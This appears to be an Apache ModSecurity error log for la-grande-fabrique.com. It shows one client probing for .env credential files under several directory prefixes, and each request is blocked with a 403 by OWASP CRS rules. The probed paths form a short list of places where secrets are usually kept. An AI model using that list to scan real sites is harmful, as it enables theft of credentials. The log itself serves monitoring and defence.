[Mon May 11 16:33:32.256312 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dist/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/dist/.env"] [unique_id "agHovEWKUxpmnkK7zHx_QQAAAQs"]
[Mon May 11 16:33:32.256733 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/dist/.env"] [unique_id "agHovEWKUxpmnkK7zHx_QQAAAQs"]
[Mon May 11 16:33:32.256922 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/dist/.env"] [unique_id "agHovEWKUxpmnkK7zHx_QQAAAQs"]
[Mon May 11 16:33:32.257202 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/dist/.env"] [unique_id "agHovEWKUxpmnkK7zHx_QQAAAQs"]
[Mon May 11 16:33:32.413963 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/public_html/.env"] [unique_id "agHovEWKUxpmnkK7zHx_QgAAAQs"]
[Mon May 11 16:33:32.414528 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/public_html/.env"] [unique_id "agHovEWKUxpmnkK7zHx_QgAAAQs"]
[Mon May 11 16:33:32.414814 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/public_html/.env"] [unique_id "agHovEWKUxpmnkK7zHx_QgAAAQs"]
[Mon May 11 16:33:32.415181 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/public_html/.env"] [unique_id "agHovEWKUxpmnkK7zHx_QgAAAQs"]
[Mon May 11 16:33:32.571529 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /htdocs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/htdocs/.env"] [unique_id "agHovEWKUxpmnkK7zHx_QwAAAQs"]
[Mon May 11 16:33:32.571907 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/htdocs/.env"] [unique_id "agHovEWKUxpmnkK7zHx_QwAAAQs"]
[Mon May 11 16:33:32.572094 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/htdocs/.env"] [unique_id "agHovEWKUxpmnkK7zHx_QwAAAQs"]
[Mon May 11 16:33:32.572357 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/htdocs/.env"] [unique_id "agHovEWKUxpmnkK7zHx_QwAAAQs"]
[Mon May 11 16:33:32.729365 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/www/.env"] [unique_id "agHovEWKUxpmnkK7zHx_RAAAAQs"]
[Mon May 11 16:33:32.729820 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/www/.env"] [unique_id "agHovEWKUxpmnkK7zHx_RAAAAQs"]
[Mon May 11 16:33:32.730038 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/www/.env"] [unique_id "agHovEWKUxpmnkK7zHx_RAAAAQs"]
[Mon May 11 16:33:32.730305 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/www/.env"] [unique_id "agHovEWKUxpmnkK7zHx_RAAAAQs"]
[Mon May 11 16:33:32.886345 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/html/.env"] [unique_id "agHovEWKUxpmnkK7zHx_RgAAAQs"]
[Mon May 11 16:33:32.886702 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/html/.env"] [unique_id "agHovEWKUxpmnkK7zHx_RgAAAQs"]
[Mon May 11 16:33:32.886956 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/html/.env"] [unique_id "agHovEWKUxpmnkK7zHx_RgAAAQs"]
[Mon May 11 16:33:32.887280 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/html/.env"] [unique_id "agHovEWKUxpmnkK7zHx_RgAAAQs"]
[Mon May 11 16:33:33.044653 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/live/.env"] [unique_id "agHovUWKUxpmnkK7zHx_RwAAAQs"]
[Mon May 11 16:33:33.045039 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/live/.env"] [unique_id "agHovUWKUxpmnkK7zHx_RwAAAQs"]
[Mon May 11 16:33:33.045239 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/live/.env"] [unique_id "agHovUWKUxpmnkK7zHx_RwAAAQs"]
[Mon May 11 16:33:33.045505 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/live/.env"] [unique_id "agHovUWKUxpmnkK7zHx_RwAAAQs"]
[Mon May 11 16:33:33.202005 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/prod/.env"] [unique_id "agHovUWKUxpmnkK7zHx_SAAAAQs"]
[Mon May 11 16:33:33.202405 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/prod/.env"] [unique_id "agHovUWKUxpmnkK7zHx_SAAAAQs"]
[Mon May 11 16:33:33.202594 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/prod/.env"] [unique_id "agHovUWKUxpmnkK7zHx_SAAAAQs"]
[Mon May 11 16:33:33.202845 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/prod/.env"] [unique_id "agHovUWKUxpmnkK7zHx_SAAAAQs"]
[Mon May 11 16:33:33.359439 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/dev/.env"] [unique_id "agHovUWKUxpmnkK7zHx_SQAAAQs"]
[Mon May 11 16:33:33.359999 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/dev/.env"] [unique_id "agHovUWKUxpmnkK7zHx_SQAAAQs"]
[Mon May 11 16:33:33.360287 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/dev/.env"] [unique_id "agHovUWKUxpmnkK7zHx_SQAAAQs"]
[Mon May 11 16:33:33.360651 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/dev/.env"] [unique_id "agHovUWKUxpmnkK7zHx_SQAAAQs"]
[Mon May 11 16:33:33.516736 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/staging/.env"] [unique_id "agHovUWKUxpmnkK7zHx_SgAAAQs"]
[Mon May 11 16:33:33.517149 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/staging/.env"] [unique_id "agHovUWKUxpmnkK7zHx_SgAAAQs"]
[Mon May 11 16:33:33.517383 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/staging/.env"] [unique_id "agHovUWKUxpmnkK7zHx_SgAAAQs"]
[Mon May 11 16:33:33.517633 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/staging/.env"] [unique_id "agHovUWKUxpmnkK7zHx_SgAAAQs"]
